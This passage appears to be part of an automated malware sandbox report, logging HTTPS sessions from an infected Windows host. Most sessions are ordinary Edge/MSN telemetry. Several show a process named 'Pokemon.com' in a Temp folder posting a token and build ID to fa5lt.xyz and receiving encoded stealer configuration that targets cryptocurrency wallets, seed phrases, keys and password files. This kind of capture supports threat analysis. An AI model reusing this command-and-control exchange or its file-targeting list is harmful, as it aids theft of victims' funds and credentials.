                                                                                                                                                                                                                                                                                    set-cookie: UID=10F921920583e33615b2b9d1735307250; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    set-cookie: XID=10F921920583e33615b2b9d1735307250; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 8770cedbbb1c2feb157dc67ce83fe00c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Td-MQbbhXGtWDUcoOcaf9TjUn7rk1B-IUgNhSlIdwFwpxB5ZL1pltQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49985 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:30 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AS26FU3EKF37QIE37Y5F
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:30 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------AS26FU3EKF37QIE37Y5FContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------AS26FU3EKF37QIE37Y5FContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------AS26FU3EKF37QIE37Y5FCont
2024-12-27 13:47:31 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:31 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:47:31 UTC | 2228 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49988 | 108.139.47.92 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:31 UTC | 1012 | OUT | GET /b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: UID=10F921920583e33615b2b9d1735307250; XID=10F921920583e33615b2b9d1735307250
2024-12-27 13:47:32 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:31 GMT
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 aa7ca65bca4d95ba9a04dd166671496c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: RMbnSmRL6TW5Kb6xD9QmUMGPZtHGC1Qt2PMmyOeSLZsO64MiHxp9Pg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49986 | 20.189.173.14 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:32 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307249039&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 3868
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
2024-12-27 13:47:32 UTC | 3868 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T13:47:29.035Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
2024-12-27 13:47:32 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=90640a4982de4a17a1a680379cf6efa7&HASH=9064&LV=202412&V=4&LU=1735307252302; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:32 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=6d02dd4483824c70b935c78e1a27120a; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:32 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 3263
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:32 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49995 | 20.110.205.119 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:32 UTC | 1261 | OUT | GET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=14C71902C8884738842424F5E7BBAD37&MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; SM=T
2024-12-27 13:47:33 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; domain=.msn.com; expires=Wed, 21-Jan-2026 13:47:32 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=1AA6CB7BE4CF62801FB6DE19E5AD630B; domain=c.msn.com; expires=Wed, 21-Jan-2026 13:47:32 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 13:47:32 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 13:57:32 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:32 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 42
2024-12-27 13:47:33 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50001 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:33 UTC | 321 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q90R9HVAI58YU3ECJEKX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: fa5lt.xyz
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 13:47:33 UTC | 331 | OUT
Data Ascii: ------Q90R9HVAI58YU3ECJEKXContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------Q90R9HVAI58YU3ECJEKXContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q90R9HVAI58YU3ECJEKXCont
2024-12-27 13:47:34 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 13:47:34 UTC | 1524 | IN
Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50016 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:35 UTC | 321 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WTR1NG4W47G47Q16PZM7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: fa5lt.xyz
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 13:47:35 UTC | 453 | OUT
Data Ascii: ------WTR1NG4W47G47Q16PZM7Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------WTR1NG4W47G47Q16PZM7Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WTR1NG4W47G47Q16PZM7Cont
2024-12-27 13:47:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 13:47:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50021 | 20.189.173.1 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:37 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307254838&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 11944
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-27 13:47:37 UTC | 11944 | OUT
Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T13:47:34.836Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
2024-12-27 13:47:38 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=d606badb4784465982a84eefb423c613&HASH=d606&LV=202412&V=4&LU=1735307258495; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=67cfcc3ea109463fb37e501bfd1f2e78; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 3657
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 27 Dec 2024 13:47:38 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50024 | 20.189.173.1 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:37 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307254841&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5219
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:37 UTC5219OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 31 33 3a 34 37 3a 33 34 2e 38 34 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 36 35 38 33 61 34 66 62 2d 31 62 31 63 2d 34 62 31 37 2d 39 35 63 31 2d 66 62 61 35 31 61 35 65 61 66 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 34 38 33 30 33 32 36 35 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T13:47:34.840Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=53d2deddb78a474796f164c5bdcf51a2&HASH=53d2&LV=202412&V=4&LU=1735307258065; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=8ff97f6c91024080a2fd8d85383ca963; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 3224
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:37 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50025 | 20.189.173.14 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:38 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307255691&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5417
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; msnup=
2024-12-27 13:47:38 UTC | 5417 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T13:47:35.690Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
2024-12-27 13:47:38 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=78704492d3c8473e8511e36dc24771fe&HASH=7870&LV=202412&V=4&LU=1735307258559; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=968cf1d13f7f46ebb7821871c65439e0; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2868
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 27 Dec 2024 13:47:38 GMT
Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    42192.168.2.55002620.189.173.14434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307255840&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
